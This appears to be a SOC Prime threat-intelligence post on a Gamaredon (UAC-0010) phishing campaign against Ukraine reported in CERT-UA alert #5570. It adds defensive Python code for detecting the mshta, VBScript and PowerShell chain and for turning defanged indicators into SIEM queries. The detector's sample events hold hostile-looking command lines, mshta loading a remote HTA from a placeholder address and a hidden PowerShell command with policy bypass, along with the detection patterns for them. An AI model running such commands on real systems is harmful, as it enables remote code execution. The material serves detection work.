Armageddon APT Hacker Group aka UAC-0010 spreads phishing emails posing as the State Service for Special Communications of Ukraine

Armageddon APT alias UAC-0010 resurfaces

The Russia-linked Armageddon APT, also known as Gamaredon or UAC-0010, has been launching a series of cyber attacks against Ukraine since the outbreak of the full-scale war. On November 8, 2022, CERT-UA issued its latest alert detailing an ongoing spear-phishing campaign by this Russia-backed cyber-espionage group, in which the adversaries mass-distribute forged emails posing as the State Service of Special Communications and Information Protection of Ukraine (SSSCIP). In this targeted campaign, the Armageddon APT relies on the malicious email attachment as its initial attack vector.

Armageddon APT (UAC-0010) Cyber Attacks: Analysis of the Latest Phishing Campaign Against Ukraine

Since Russia’s full-scale invasion of Ukraine, the infamous Russia-linked Armageddon APT, also tracked as UAC-0010 or Primitive Bear, has been actively using phishing and malicious email attachments in targeted campaigns against Ukraine. In May and July 2022, the group mass-distributed the GammaLoad.PS1_v2 malware, while in August 2022 the adversaries used GammaSteel.PS1 and GammaSteel.NET to spread the infection on compromised systems.

In the ongoing campaign reported in the CERT-UA#5570 alert, the infection chain is triggered by a phishing email carrying a malicious attachment. Opening it downloads an HTML file containing JavaScript code, which creates a RAR archive with a shortcut (LNK) file on the victim's computer. Once the LNK file is opened, it downloads and executes an HTA file, which in turn runs malicious VBScript code. This ultimately leads to the deployment of several malicious payloads on the targeted systems, including information-stealing malware.
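The chain above (LNK opens an HTA through mshta.exe, the HTA runs VBScript, the script stage launches a PowerShell loader) leaves a distinctive parent/child trail in process-creation telemetry. The following is an added example for this article, not SOC Prime's Sigma content or CERT-UA's code: it runs three Sigma-style conditions over constructed Sysmon-like events (Image, CommandLine, ParentImage) and correlates them into the chain. The IP address, paths and the benign installer event are placeholders; the technique IDs are the ones this article maps (T1218 for mshta, T1059 for the script stages).

```python
"""Toy process-creation detection for the execution chain described in the
CERT-UA#5570 alert: LNK -> mshta.exe loads an .hta -> VBScript host -> PowerShell.

Added example for this article; not SOC Prime's or CERT-UA's code. Field names
mirror Sysmon Event ID 1 (Image, CommandLine, ParentImage). All events are
constructed; 198.51.100.7 is an RFC 5737 documentation address."""

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# mshta pulling its HTA from a URL or a user-writable folder is the suspicious
# pattern; an installer running its own HTA from Program Files is not.
SUSPICIOUS_HTA_SOURCE = re.compile(r"https?://|\\temp\\|\\appdata\\|\\downloads\\", re.I)


def rule_mshta_remote_hta(e: ProcEvent) -> bool:
    # T1218 (sub-technique T1218.005, Mshta)
    return basename(e.image) == "mshta.exe" and bool(SUSPICIOUS_HTA_SOURCE.search(e.command_line))


def rule_script_host_from_mshta(e: ProcEvent) -> bool:
    # T1059 (VBScript stage spawned by the HTA)
    return basename(e.image) in SCRIPT_HOSTS and basename(e.parent_image) == "mshta.exe"


def rule_powershell_from_script_host(e: ProcEvent) -> bool:
    # T1059 (PowerShell loader launched by the script stage)
    return basename(e.image) in POWERSHELL and basename(e.parent_image) in SCRIPT_HOSTS | {"mshta.exe"}


RULES = [
    ("T1218", "mshta.exe executed with a remote or user-writable HTA", rule_mshta_remote_hta),
    ("T1059", "script host spawned by mshta.exe", rule_script_host_from_mshta),
    ("T1059", "PowerShell spawned by a script host", rule_powershell_from_script_host),
]


def match_rules(events):
    """Return (technique, description, process name) for every rule hit."""
    return [(tid, desc, basename(e.image))
            for e in events for tid, desc, pred in RULES if pred(e)]


def find_chains(events):
    """Heuristic correlation by image names: mshta -> script host -> PowerShell.
    A production pipeline should join on ProcessGuid/ParentProcessGuid instead."""
    hosts_from_mshta = {basename(e.image) for e in events if rule_script_host_from_mshta(e)}
    chains = []
    for e in events:
        parent = basename(e.parent_image)
        if basename(e.image) in POWERSHELL and parent in hosts_from_mshta:
            chains.append(("mshta.exe", parent, basename(e.image)))
    return chains


# Constructed sample events (placeholders, not from a real incident).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", "explorer.exe",
              r"C:\Windows\System32\userinit.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://198.51.100.7/docs/notice.hta",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"wscript.exe //e:vbscript C:\Users\u\AppData\Local\Temp\stage.vbs",
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -ep bypass -c $x",
              r"C:\Windows\System32\wscript.exe"),
    # Benign: a vendor installer running its own HTA from Program Files.
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Program Files\Vendor\setup.hta",
              r"C:\Program Files\Vendor\setup.exe"),
]

if __name__ == "__main__":
    for hit in match_rules(SAMPLE_EVENTS):
        print("hit:", hit)
    print("chains:", find_chains(SAMPLE_EVENTS))
```

The first rule is deliberately narrower than "any mshta.exe execution": HTA files are still used by legitimate installers, so the source of the HTA (URL, Temp, AppData, Downloads) is what separates the CERT-UA#5570 pattern from noise. The chain correlation is what raises confidence from three medium-severity hits to one high-severity incident.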

CERT-UA researchers report that the phishing emails are sent via the @mail.gov.ua service. In addition, the Armageddon APT follows its usual pattern of using third-party services or Telegram to determine the C2 server IP address.

Detecting the latest Armageddon APT campaign against Ukrainian entities

The series of phishing campaigns by the Russia-linked Armageddon APT, which has repeatedly targeted Ukraine since March 2022, represents a growing threat that requires timely detection and strong response capabilities from security professionals. SOC Prime’s Detection-as-Code platform offers a curated set of Sigma rules to identify the malicious activity covered in the CERT-UA#5570 alert early in the attack lifecycle. Follow the link below to access the relevant detection content tagged “CERT-UA#5570” after the corresponding cybersecurity alert:

Sigma rules for detecting malicious activity of the UAC-0010 group covered in the CERT-UA#5570 alert

To proactively defend against current and emerging Armageddon APT cyber attacks tracked by cyber defenders since Russia’s full-scale invasion of Ukraine, press the Explore Detections button to access the dedicated detection stack. All Sigma rules are aligned with MITRE ATT&CK® and enriched with extensive threat context, including relevant CTI links, mitigations, executable binaries, and other relevant metadata. The detection rules come with translations for industry-leading SIEM, EDR, and XDR solutions.

Explore detections

To simplify the threat hunting routine and boost detection engineering capabilities, security experts can search for IOCs associated with the UAC-0010 activity covered in the CERT-UA#5570 alert. Simply paste the text containing the relevant IOCs into Uncoder CTI and get custom IOC queries ready to run in the chosen environment.

IOCs for alert CERT-UA#5570 using Uncoder CTI
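The IOC-to-query step described above (paste indicator text, get a search) is easy to underestimate: real CTI reports are defanged (hxxp, [.]), mix IPs, URLs and hashes in free text, and a naive domain regex will happily treat notice.hta as a hostname. The following is an added example for this article, not Uncoder CTI's or SOC Prime's code. The indicator text is constructed from RFC 5737 / RFC 2606 placeholder values and is not the CERT-UA#5570 indicator set; the Splunk-style field names (dest_ip, query, file_hash) are an assumption and must be mapped to the target SIEM's schema.

```python
"""Turn a pasted, defanged indicator list into a ready-to-run search.

Added example for this article; not Uncoder CTI's or SOC Prime's code.
The sample text below is constructed from placeholder values (RFC 5737
addresses, RFC 2606 names, the SHA-256 of an empty file) and is NOT the
CERT-UA#5570 indicator set. Field names in to_search() are assumptions."""

import re

SAMPLE_IOC_TEXT = """\
Constructed indicator list (placeholders, not from the CERT-UA#5570 alert):
C2 addresses: 192[.]0[.]2[.]45, 198.51.100.7
Staging URL: hxxp://docs[.]example[.]net/notice.hta
Also seen: update-notice.example.com
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"https?://([^\s/\"'<>]+)[^\s\"'<>]*", re.I)
DOMAIN = re.compile(r"\b(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}\b", re.I)
SHA256 = re.compile(r"\b[0-9a-f]{64}\b", re.I)


def refang(text: str) -> str:
    """Undo the common defanging conventions so the regexes see real indicators."""
    return (text.replace("[.]", ".").replace("(.)", ".")
                .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def valid_ipv4(s: str) -> bool:
    return all(0 <= int(octet) <= 255 for octet in s.split("."))


def extract_iocs(text: str) -> dict:
    text = refang(text)
    ips = sorted({m for m in IPV4.findall(text) if valid_ipv4(m)})

    # Take URL hosts first, then blank the URLs so path components such as
    # notice.hta are not mistaken for domains.
    hosts = set()

    def take_host(match):
        hosts.add(match.group(1).lower())
        return " "

    text = URL.sub(take_host, text)
    domains = sorted((hosts | {d.lower() for d in DOMAIN.findall(text)}) - set(ips))
    hashes = sorted({h.lower() for h in SHA256.findall(text)})
    return {"ips": ips, "domains": domains, "sha256": hashes}


def to_search(iocs: dict) -> str:
    """Splunk-style search. dest_ip / query / file_hash are assumed field
    names; map them to the schema of the SIEM you actually run."""
    clauses = []
    for field, values in (("dest_ip", iocs["ips"]),
                          ("query", iocs["domains"]),
                          ("file_hash", iocs["sha256"])):
        if values:
            clauses.append("(" + " OR ".join(f'{field}="{v}"' for v in values) + ")")
    return "index=* " + " OR ".join(clauses)


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_IOC_TEXT)
    print(found)
    print(to_search(found))
```

Two details matter in practice: refang before matching (otherwise every bracketed indicator is silently dropped), and never let IP literals leak into the domain list or URL paths into the hostname list, because a query built from false indicators produces confident-looking but useless hits.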

MITRE ATT&CK® Context

To delve into the context behind the latest cyber attacks by the Russia-linked Armageddon APT group, aka UAC-0010, covered in the CERT-UA#5570 alert, all dedicated Sigma rules are aligned with the MITRE ATT&CK® framework, addressing the corresponding tactics and techniques:

Tactic | Techniques | Sigma rule
Defense Evasion | Signed Binary Proxy Execution (T1218) |
Execution | Command and Scripting Interpreter (T1059) |
Command and Control | Protocol Tunneling (T1572) |

The post Armageddon APT Hacker Group aka UAC-0010 spreads phishing emails posing as the State Service for Special Communications of Ukraine appeared first on SOC Prime.
